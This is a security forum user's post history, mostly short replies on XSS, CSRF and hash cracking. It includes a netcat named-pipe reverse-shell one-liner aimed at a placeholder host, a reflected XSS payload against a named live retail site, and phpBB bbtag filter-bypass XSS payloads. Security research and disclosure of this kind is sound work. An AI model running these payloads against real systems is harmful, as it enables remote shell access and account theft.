Sla.ckers.org

Results 1 - 26 of 26
4 years ago
chosi
Current Ubuntu's netcat does not come with an -e switch (i.e. executing commands directly from within netcat), so I saw this workaround, which might fit into this thread:

listening:
mkfifo mypipe;cat mypipe|/bin/bash|nc -l 6000 >mypipe;rm mypipe

connecting:
mkfifo mypipe;cat mypipe|/bin/bash|nc backconnect-address 12344 >mypipe;rm mypipe

(change backconnect-address and/or ports) P.S.:
Forum: Obfuscation
4 years ago
chosi
ugh, congrats man.. and of course the brute force starts with A and ends with z :P
Forum: OMG Ponies
4 years ago
chosi
"mixed alpha" does not include weird letters like ö, does it? ;)
Forum: OMG Ponies
4 years ago
chosi
me too. Seems like you have a typo in your challenge :P
Forum: OMG Ponies
4 years ago
chosi
....despite the fact that you can just fake the referer ;)
Forum: CSRF and Session Info
4 years ago
chosi
The Session-ID is probably bound to the victim's IP address
Forum: XSS Info
4 years ago
chosi
err. There is no CNAME (anymore?). EDIT: nvm, I confused www.google-anon.com with google-anon.com ;)
Forum: Privacy
5 years ago
chosi
oh interesting. thanks for the answers! :)
Forum: XSS Info
5 years ago
chosi
Hi, are there any known test results on how browsers handle HTML tags after a closing </html>? I was just wondering how, for example, an <img> tag gets handled depending on browser (and, if this is a serious criterion, doctype). My quick answer would be "yeah, everything after a </html> tag gets rendered, evaluated and so on, completely disregarding the closing tag".
Forum: XSS Info
5 years ago
chosi
her texts should be on twitter *scnr*
Forum: OMG Ponies
5 years ago
chosi
...yes!
Forum: OMG Ponies
5 years ago
chosi
rvdh is right, it's most probably crypt(), as used in /etc/shadow. So I'd recommend John the Ripper to crack it.
Forum: SQL and Code Injection
5 years ago
chosi
PaPPy Wrote:
> ...
> i need some help with this one
> http://www.homedecorators.com/search.php?search=%22%3E%2526lt%26lt%3B%2Fa%26gt%3Bmarquee%3Etest&x=0&y=0

how about http://www.homedecorators.com/searchTips.php?search=%22%3E/onmouseover=alert(1)// - only an event handler though :) Funny: NoScript s
Forum: Full Disclosure
5 years ago
chosi
digi7al64 Wrote:
> blackboard has so many xss (persistent and reflective) vuns in it its not funny. We spent an afternoon on it one day and came back with about 20 different versions in different spots.

yup. If you try three random parameters in a URL, at least two of them are vulnerable. Great for people new to XSS: it's _bound_ to happen ;)
Forum: Full Disclosure
5 years ago
chosi
oh yeah, right. Thank you ;)
Forum: XSS Info
5 years ago
chosi
hello & merry christmas :) Usually when I find an XSS vulnerability on a webpage, I send the guy/author an email like "oh, there's an XSS thingie on your site, please fix. See proof of concept (link) and consider escaping input from the web. Of course this vulnerability might allow malicious guys to steal user accounts ..." BUT: I recently found an XSS vulnerability on a w
Forum: XSS Info
5 years ago
chosi
That explains it all. :> I even managed to create an XHR with this limited charset.. Did you know that you don't need the "new" in r=new XMLHttpRequest()? :)
Forum: XSS Info
5 years ago
chosi
OK I got something! :) It works if we use this one:

onload=document.location="javascript:alert%281%29//

The HTML output would be:

<img src="http://..mimetex.cgi?E<a href="http://onload=document.location=&quot;javascript&#058;alert%281%29//" ..>

The colon is still filtered, but somehow Firefox doesn't mind it *now*, since we start with a double quot
Forum: XSS Info
5 years ago
chosi
Thanks Gareth, we're getting closer now: The first one is not "URLish" enough - we're inside a standard url bbtag of phpBB here - so no newlines either (I meant whitespace including newlines, tabs etc.). The second one doesn't match the URL regex either; phpBB doesn't like backslashes nor single quotes. What I did find out: % does NOT get encoded (contrary to what I said above -
Forum: XSS Info
5 years ago
chosi
Thank you for finding this out! I didn't have the chance to take a look at the ACP of phpBB3 yet - so I'll talk to the guy with the LaTeX idea about this issue ;) Nevertheless: Any idea how to call functions like alert(1) without the use of parentheses AND whitespace? I didn't get closer than these two:

a setter=alert,a=1 -- Not allowed: whitespace
a=alert,a(1) -- Not allowed: parentheses
Forum: XSS Info
5 years ago
chosi
Okay, I continued testing, also using your examples. Let me sum up what I found out:

- I cannot use parentheses ( and ); using %28 and %29 does not work either.
- No whitespace.
- Input has to look like a URL, checked against a regex.
- The closing " after my payload causes JS errors, so I will end with //.
- The img gets loaded, so we, of course, use an onload event.

My conclusion is:
Forum: XSS Info
5 years ago
chosi
Ok, javascript: doesn't work, as there is a second whitelist check against allowed protocols. Don't know why phpBB checks twice :) So we're still looking for a character to separate HTML attributes (except whitespace and a slash).
Forum: XSS Info
5 years ago
chosi
I *do* have problems exploiting this :> The problem is that phpBB's limits are quite hard to work with. We can start the content of [-tags only with letters only]
Forum: XSS Info
5 years ago
chosi
Starting with a forward slash is not allowed (I suppose we have to match against a regex for URLs - will find out about that in the phpBB code as well). I will think about a possible circumvention later - after reading the mentioned topic. Thanks for your input - gonna check that out tomorrow :)
Forum: XSS Info
5 years ago
chosi
I got a little further: (again, [-brackets are replaced)

D(latex]E(url=http://example.org/?;onerror=window.location=//example.org/+//test.html]text(/url]B(/latex]C

leads to:

D<img src="http://mitaub.sourceforge.net/cgi-bin/mimetex.cgi?E<a href="http://example.org/?;onerror=window.location=//example.org/+//test.html" target="_blank" class="postlink"&
Forum: XSS Info
5 years ago
chosi
Hey, there's a feature in phpBB to create your own bbtags, which can lead to invalid HTML code. Please note that I have replaced the character '[' by '(' to prevent *THIS* forum from interpreting any BBCode ;) There's a quite common method to render LaTeX by inserting an img, e.g.:

(LaTeX]{TEXT}(/LaTeX]

is replaced with:

<img src="http://mitaub.sourceforge.net/cgi-bin/mimet
Forum: XSS Info